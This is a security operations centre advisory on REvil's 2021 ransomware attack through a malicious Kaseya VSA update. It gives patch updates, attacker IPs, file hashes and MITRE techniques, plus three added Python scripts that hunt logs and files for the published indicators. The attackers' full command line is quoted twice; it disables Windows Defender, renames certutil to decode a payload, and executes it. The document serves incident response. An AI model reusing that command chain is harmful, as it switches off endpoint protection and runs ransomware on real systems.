SOC Advisory ***REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2***
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Jul 14, 2021 - 13:36 EDT
Monitoring
REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2

Posted Date: 07/12/2021

Published Date: 07/12/2021

Source: Kaseya

Sector: Information Technology & Information Security

DATE(S) ISSUED: 07/02/2021

UPDATED: 07/12/2021

SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group

UPDATED OVERVIEW – 07/12/2021:

Kaseya has now successfully developed a patch for VSA servers on Sunday 07/11/2021. Below are the latest communications from Kaseya. These communications can also be found using the link in the references below.

You can install the patch with the "KInstall.exe" update utility, found online here if you do not find a local copy. Installing the patch may prompt you to run Windows Update if you have not recently installed the latest updates from Microsoft.

From our testing, installing the patch took approximately 10 minutes. After logging back in to the VSA service, you are prompted to change your password to meet the new policy requirements. With this patch installed, we believe the attack vector is no longer present.

Also note as previously communicated, spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments.

Do not click on any links or download any attachments in emails claiming to be a Kaseya advisory. Moving forward, all new Kaseya email updates will not contain any links or attachments.

VSA Update – 07/12/2021 8:00 AM EST:

As posted in the previous update we released the patch to VSA On-Premises customers and began deploying to our VSA SaaS Infrastructure prior to the 4:00 PM target. The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. We will continue to post updates as new information becomes available.

VSA Update – 07/11/2021 4:30 EST:

VSA SaaS and On-Premises Release Notes have now been published and are available at: https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041

VSA SaaS:
The restoration of our VSA SaaS Infrastructure has begun. We will send email notifications as the individual instances come back online over the next several hours.
Please review:
VSA SaaS Startup Runbook – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709476369
VSA SaaS Hardening and Best Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403622421009-VSA-SaaS-Best-Practices

VSA On-Premises

The VSA On-Premises patch is now available. You can run KINSTALL as you normally do as part of your patching process.
Please review:
On Premises Startup Runbook (Updated July 11th – Updated Step 4) – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993incident-response

VSA On-Premise Hardening and Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417
Status updates from Kaseya can be found using the link as follows: https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb

OVERVIEW:

“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.

The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.

MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.”

References:
https://www.msspalert.com/cybersecurity-breaches-and-attacks/kaseya-rmm-cyberattack-warning/
https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb
https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack
https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753

UPDATED THREAT INTELLIGENCE - 07/07/2021:

All on-premises VSA servers should remain offline until Kaseya issues further instructions on when it is safe to restore operations. A patch will need to be installed before the VSA is restarted, together with a set of recommendations on how to increase your security posture.
On Monday, July 5, Kaseya announced they are developing a new patch for on-premise installations in order to assist customers in getting back to service. Kaseya also published a Compromise Detection Tool for customers to check whether their on-premise installation had actually been compromised.

Since this outbreak, attackers have been scanning for internet-exposed Kaseya on-premise servers using publicly available platforms such as Shodan.io. This time window allows attack groups besides REvil to obtain immediate access over the internet to sensitive customer networks.
At this point, this appears to be the largest mass-scale ransomware incident to date. In an unexpected twist, the attackers are offering a universal decryption tool for all victims at a lump sum of $50 million (originally $70 million).

THREAT INTELLIGENCE:

“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say, "Kaseya has been hacked" without evidence).”

Kaseya's official recommendation is to: “IMMEDIATELY shut down your local VSA server until you receive further notice from us.

We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shut down your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”

SYSTEMS AFFECTED: Kaseya VSA Servers - Windows

RISK:

Managed Service Providers (MSPs), i.e. companies that provide remote IT services to other companies or access to remote systems, are affected by this threat. Kaseya VSA is also used directly by medium and large businesses, so this attack is not limited to MSPs but affects non-MSP entities as well.

UPDATED TECHNICAL SUMMARY - 07/07/2021:

On July 2 around 10:30 ET many Kaseya VSA servers were exploited and used to deploy ransomware. Here are the details of the server-side intrusion:

Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).
A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in the %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory, with file names following this modified ISO 8601 naming scheme: KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.

Attackers came from the following IP addresses using the user agent curl/7.69.1:

• 18.223.199[.]234 (Amazon Web Services) - discovered by Huntress
• 161.35.239[.]148 (Digital Ocean) - discovered by TrueSec
• 35.226.94[.]113 (Google Cloud) - discovered by Kaseya
• 162.253.124[.]162 (Sapioterra) - discovered by Kaseya

We've been in contact with the internal hunt teams at AWS and Digital Ocean and have passed information to the FBI Dallas office and relevant intelligence community agencies.
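The log artifacts above (the KaseyaEdgeServices file naming scheme, the curl/7.69.1 user agent and the four published source IPs) can be hunted for with a short script. The following is an added example written for this advisory, not tooling from Kaseya, Huntress or CyFlare. It assumes a constructed line layout ("timestamp client-ip METHOD path status "user-agent"") because the advisory does not document the real KaseyaEdgeServices line format; adjust LINE_RE to your own files. The sample lines are constructed.

```python
"""Hunt KaseyaEdgeServices logs for the attacker IPs and user agent from the advisory.

Added example, not vendor code. The log line layout parsed by LINE_RE is an
ASSUMPTION for illustration; real KaseyaEdgeServices lines may differ.
"""
import re
from datetime import datetime
from pathlib import Path

# Source IPs published in the advisory (de-fanging brackets removed)
ATTACKER_IPS = {
    "18.223.199.234",   # Amazon Web Services, reported by Huntress
    "161.35.239.148",   # Digital Ocean, reported by TrueSec
    "35.226.94.113",    # Google Cloud, reported by Kaseya
    "162.253.124.162",  # Sapioterra, reported by Kaseya
}
ATTACKER_UA = "curl/7.69.1"   # user agent of the attacker requests per the advisory

# File naming scheme from the advisory: KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log
LOG_NAME_RE = re.compile(r"^KaseyaEdgeServices-(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z\.log$")


def log_file_timestamp(name):
    """Return the UTC datetime encoded in a log file name, or None if it does not match."""
    m = LOG_NAME_RE.match(name)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S")


def select_log_names(names, start_iso, end_iso):
    """Keep the log file names whose embedded timestamp lies in [start, end].
    Bounds are ISO strings such as "2021-07-02T00:00:00Z" (UTC)."""
    start = datetime.strptime(start_iso, "%Y-%m-%dT%H:%M:%SZ")
    end = datetime.strptime(end_iso, "%Y-%m-%dT%H:%M:%SZ")
    chosen = []
    for name in names:
        ts = log_file_timestamp(name)
        if ts is not None and start <= ts <= end:
            chosen.append(name)
    return sorted(chosen)


def select_log_files(directory, start_iso, end_iso):
    """Same selection applied to the files in a directory (e.g. the KaseyaEdgeServices log dir)."""
    names = [p.name for p in Path(directory).iterdir() if p.is_file()]
    return [Path(directory) / n for n in select_log_names(names, start_iso, end_iso)]


# CONSTRUCTED line layout (assumption): <timestamp> <client ip> <METHOD> <path> <status> "<user agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<method>GET|POST)\s+'
    r'(?P<path>\S+)\s+(?P<status>\d{3})\s+"(?P<ua>[^"]*)"'
)


def scan_lines(lines):
    """Return (line_no, ip, method, path, reasons) for every line that matches an indicator.
    A line is flagged when the client IP is a published attacker IP and/or the
    user agent is curl/7.69.1; unparseable lines are skipped, not flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = []
        if m["ip"] in ATTACKER_IPS:
            reasons.append("attacker-ip")
        if m["ua"] == ATTACKER_UA:
            reasons.append("curl-7.69.1-ua")
        if reasons:
            hits.append((n, m["ip"], m["method"], m["path"], reasons))
    return hits


# Constructed sample lines; 203.0.113.7 and 10.0.0.25 are documentation/private addresses
SAMPLE_LINES = [
    '2021-07-02T14:31:07Z 18.223.199.234 GET /placeholder/path 200 "curl/7.69.1"',
    '2021-07-02T14:31:09Z 18.223.199.234 POST /placeholder/path 200 "curl/7.69.1"',
    '2021-07-02T14:32:40Z 10.0.0.25 GET /placeholder/console 200 "Mozilla/5.0"',
    '2021-07-02T14:33:02Z 203.0.113.7 GET /placeholder/path 403 "curl/7.69.1"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        print(hit)
```

Run it against the real directory with select_log_files(r"C:\ProgramData\Kaseya\Log\KaseyaEdgeServices", "2021-07-02T00:00:00Z", "2021-07-03T00:00:00Z") and feed each file's lines to scan_lines; a curl/7.69.1 hit from an address outside the published list is still worth a look, which is why the user agent is matched independently of the IP set.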

The VSA procedure used to deploy the encryptor was named "Kaseya VSA Agent Hot-fix”. An additional procedure named "Archive and Purge Logs" was run to clean up after themselves.

The "Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
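The command line above breaks down into a handful of independently observable steps (a long loopback ping used as a sleep, Defender being switched off through Set-MpPreference, certutil.exe copied under a new name, random bytes appended to change its hash, and a -decode of a .crt into an .exe). The following is an added example written for this advisory, not code from Huntress, Kaseya or CyFlare, showing how a process-creation or VSA procedure log can be scored against those steps so that a variant which changes file names still trips most of them. The benign sample command lines are constructed; PING_SLEEP_MIN and the two-indicator threshold are assumptions to tune.

```python
"""Score process command lines against the steps of the "Kaseya VSA Agent Hot-fix" procedure.

Added example, not vendor code. Each indicator is matched on its own so that
partial variants still score; PING_SLEEP_MIN and the threshold are ASSUMPTIONS.
"""
import re

PING_SLEEP_MIN = 100  # assumption: a loopback ping with -n this large is being used as a sleep

INDICATORS = {
    # Defender tampering: Set-MpPreference disabling a protection (switches seen in the procedure)
    "defender-tamper": re.compile(
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IntrusionPreventionSystem|"
        r"IOAVProtection|ScriptScanning)\s+\$true", re.I),
    # certutil.exe copied to a differently named file (T1036.003 Rename System Utilities)
    "certutil-copy": re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+(?!\S*certutil\.exe)\S+", re.I),
    # random bytes appended to the copied binary to change its hash
    "random-append": re.compile(r"echo\s+%RANDOM%\s*>>", re.I),
    # a .crt decoded into an .exe (certutil -decode of the agent.crt payload)
    "certutil-decode": re.compile(r"\S+\s+-decode\s+\S+\.crt\s+\S+\.exe", re.I),
    # loopback ping with a large count used as a delay; the count is checked in code
    "ping-sleep": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I),
}


def match_indicators(cmdline):
    """Return the names of the indicators present in one command line."""
    found = []
    for name, rx in INDICATORS.items():
        m = rx.search(cmdline)
        if not m:
            continue
        if name == "ping-sleep" and int(m.group(1)) < PING_SLEEP_MIN:
            continue  # short pings are ordinary connectivity checks
        found.append(name)
    return found


def classify(cmdline, threshold=2):
    """Label a command line "suspicious" when at least `threshold` indicators co-occur.
    Requiring two avoids alerting on a lone legitimate Set-MpPreference or certutil call."""
    hits = match_indicators(cmdline)
    return ("suspicious" if len(hits) >= threshold else "benign"), hits


# The procedure command line as quoted in the advisory
HOTFIX_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
    r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)

# Constructed benign command lines that share single tokens with the procedure
BENIGN_CMDS = [
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul',
    r'C:\Windows\System32\certutil.exe -hashfile C:\Users\admin\setup.exe SHA256',
    r'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false',
]

if __name__ == "__main__":
    print(classify(HOTFIX_CMD))
    for cmd in BENIGN_CMDS:
        print(classify(cmd))
```

The advisory's command line scores all five indicators; each constructed benign line scores none, so the threshold can be kept low without the single-token false positives a plain "certutil" or "Set-MpPreference" keyword search would produce.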

Endpoint Indicators of Compromise

Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\

When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path "c:\Windows" to perform DLL sideloading.

The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter, which contains several registry values that store the encryptor's runtime keys and configuration artifacts.

• agent.crt - MD5: 939aae3cc456de8964cb182c75a5f8cc - Encoded malicious content
• agent.exe - MD5: 561cffbaba71a6e8cc1cdceda990ead4 - Decoded contents of agent.crt
• cert.exe - MD5: - Legitimate Windows certutil.exe utility
• mpsvc.dll - MD5: a47cf00aedf769d60d58bfe00c0b5421 - REvil encryptor payload
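A practitioner checking endpoints against the file artifacts above wants both a hash match and a name match, since cert.exe has no fixed hash (random bytes are appended to the certutil copy) and TempPath can be changed away from c:\kworking. The following is an added example for this advisory, not a tool from Kaseya, Huntress, CyFlare or any vendor named here; the hash values are the ones listed in this advisory (MD5s above and the agent.exe SHA-1/SHA-256 from the VirusTotal details further down), and the scanned directory is a parameter.

```python
r"""Check a directory tree for the REvil/Kaseya file artifacts by hash and by name.

Added example, not vendor code. Hashes below are copied from the advisory;
the default TempPath c:\kworking is also from the advisory but is configurable
(HKLM\SOFTWARE\WOW6432Node\Kaseya\Agent), so the root to scan is a parameter.
"""
import hashlib
import sys
from pathlib import Path

# Published hashes from the advisory. cert.exe has none: it is certutil.exe
# with random bytes appended, so its hash differs on every host.
KNOWN_MD5 = {
    "939aae3cc456de8964cb182c75a5f8cc": "agent.crt (encoded payload)",
    "561cffbaba71a6e8cc1cdceda990ead4": "agent.exe (decoded dropper)",
    "a47cf00aedf769d60d58bfe00c0b5421": "mpsvc.dll (REvil encryptor)",
}
KNOWN_SHA1 = {
    "5162f14d75e96edb914d1756349d6e11583db0b0": "agent.exe (decoded dropper)",
}
KNOWN_SHA256 = {
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e": "agent.exe (decoded dropper)",
}
# File names the advisory ties to the intrusion; flagged even when the hash differs
SUSPECT_NAMES = {"agent.crt", "agent.exe", "mpsvc.dll", "cert.exe"}


def _digests(chunks):
    """Compute MD5, SHA-1 and SHA-256 in one pass over an iterable of byte chunks."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    for block in chunks:
        md5.update(block)
        sha1.update(block)
        sha256.update(block)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()


def hash_bytes(data):
    """Digests of an in-memory byte string (handy for testing and for small files)."""
    return _digests([data])


def hash_file(path, chunk=1 << 20):
    """Digests of a file, streamed in 1 MiB chunks so large files do not load into memory."""
    with open(path, "rb") as f:
        return _digests(iter(lambda: f.read(chunk), b""))


def classify_file(name, md5, sha1, sha256):
    """Return the reasons a file is of interest; an empty list means nothing matched."""
    reasons = []
    if md5 in KNOWN_MD5:
        reasons.append("md5:" + KNOWN_MD5[md5])
    if sha1 in KNOWN_SHA1:
        reasons.append("sha1:" + KNOWN_SHA1[sha1])
    if sha256 in KNOWN_SHA256:
        reasons.append("sha256:" + KNOWN_SHA256[sha256])
    if name.lower() in SUSPECT_NAMES:
        reasons.append("name-match")
    return reasons


def scan_tree(root):
    """Walk `root` and return (path, md5, sha1, sha256, reasons) for every flagged file."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        try:
            md5, sha1, sha256 = hash_file(p)
        except OSError:
            continue  # locked or unreadable files are skipped rather than aborting the scan
        reasons = classify_file(p.name, md5, sha1, sha256)
        if reasons:
            findings.append((str(p), md5, sha1, sha256, reasons))
    return findings


if __name__ == "__main__":
    # Usage: python scan.py <directory>   (e.g. the configured TempPath and C:\Windows)
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

A name-only hit (for example an agent.exe whose hash is not in the list) is the expected outcome for a repacked sample and should be treated as a lead to pull the file for analysis, not dismissed because the hash did not match.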

Mitre TTPs Used in Kaseya Attack

• T1112 – Modify Registry
• T1012 – Query Registry
• T1082 – System Information Discovery
• T1120 – Peripheral Device Discovery
• T1491 – Defacement
• T1543.003 – Create or Modify System Process: Windows Service
• T1036 – Masquerading
• T1036.003 – Masquerading: Rename System Utilities
• T1202 – Indirect Command Execution
• T1486 – Data Encrypted for Impact
• T1106 – Native API


TECHNICAL SUMMARY:

Here are the validated indicators of compromise known at this time:

Ransomware encryptor is dropped to c:\kworking\agent.exe

The VSA procedure is named "Kaseya VSA Agent Hot-fix”

At least two tasks run the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Other possible Indicators of Compromise (IOCs) identified:

VirusTotal details (agent.exe):

MD5: 561cffbaba71a6e8cc1cdceda990ead4
SHA-1: 5162f14d75e96edb914d1756349d6e11583db0b0
SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Vhash: 095056655d15656az47!z
Authentihash: c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f
Imphash: 59349b1648eddf021c01f05a17a0e870
Rich PE header hash: 60c050aad9e163c9893ac438cc74b2bf
SSDEEP: 24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE
TLSH: T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389
File type: Win32 EXE
Magic: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID: Windows Control Panel Item (generic) (88.3%); Win64 Executable (generic) (4.7%); Win16 NE executable (generic) (2.2%); Win32 Executable (generic) (2%); OS/2 Executable (generic) (0.9%)
File size: 890.88 KB (912264 bytes)

UPDATED ACTIONS TAKEN - 07/12/2021:

The CyFlare SOC is still actively monitoring for indicators of compromise related to the Kaseya supply chain attack. The updated actions taken are as follows:

• Worked with our security tool vendors such as Stellar Cyber-BDS, SentinelOne, Sophos, and Tenable to have the IOCs identified from the attack productized into new security detections.
o The detection for this activity “Emerging Threat Detection” is now active for BDS. If it’s triggered in your environment, then the SOC will immediately escalate.
o Confirmed there are AlienVault OTX Pulses for detecting this activity and triggering security detections if observed. Reference Link: https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753
o SentinelOne has also confirmed that this threat is detected and mitigated by SentinelOne. Reference Link: https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
o Sophos has published a query to check for matching IOCs present on endpoints. Reference Link: https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
o Tenable has released a local Windows detection for Kaseya agents as well as a remote detection plugin for Kaseya VSA to help you identify potentially vulnerable systems. When patches are available, we will also provide a version check plugin.
• We have been continuously searching for any suspicious artifacts observed within affected customer’s environments since this threat has emerged.
• As of today July 12th, using updated artifacts we can confirm we still have not observed any indicators of compromise among all of our clients related to this emerging threat.
• Please continue to ensure local VSA servers are shut off until further notice from Kaseya. SaaS offerings of VSA are all still shut down by Kaseya (no SaaS VSA services online) until further notice and a patch is developed.

ACTIONS TAKEN:

The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.

At this time, we do not believe any of our customers utilizing Kaseya are compromised. This conclusion is the result of threat hunting searches for the indicators of compromise listed above, performed in each affected customer’s environment and the security solutions CyFlare manages.

For our managed endpoint or SentinelOne MDR customers, we have also implemented a global blacklist on one key IOC identified: the SHA-1 hash identified as the Kaseya VSA ransomware encryptor hash.

As more details on this emerging threat arise through the cyber community or through Kaseya notices, your SOC will continue to address them. If there are any further updates, or any indication that one of our affected customers is compromised, we will engage you immediately.

If you have any further questions, comments, or concerns regarding this threat, please do not hesitate to contact your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.

Thank you for your cooperation.
Posted Jul 12, 2021 - 14:43 EDT
This incident affected: Breach Detection Service.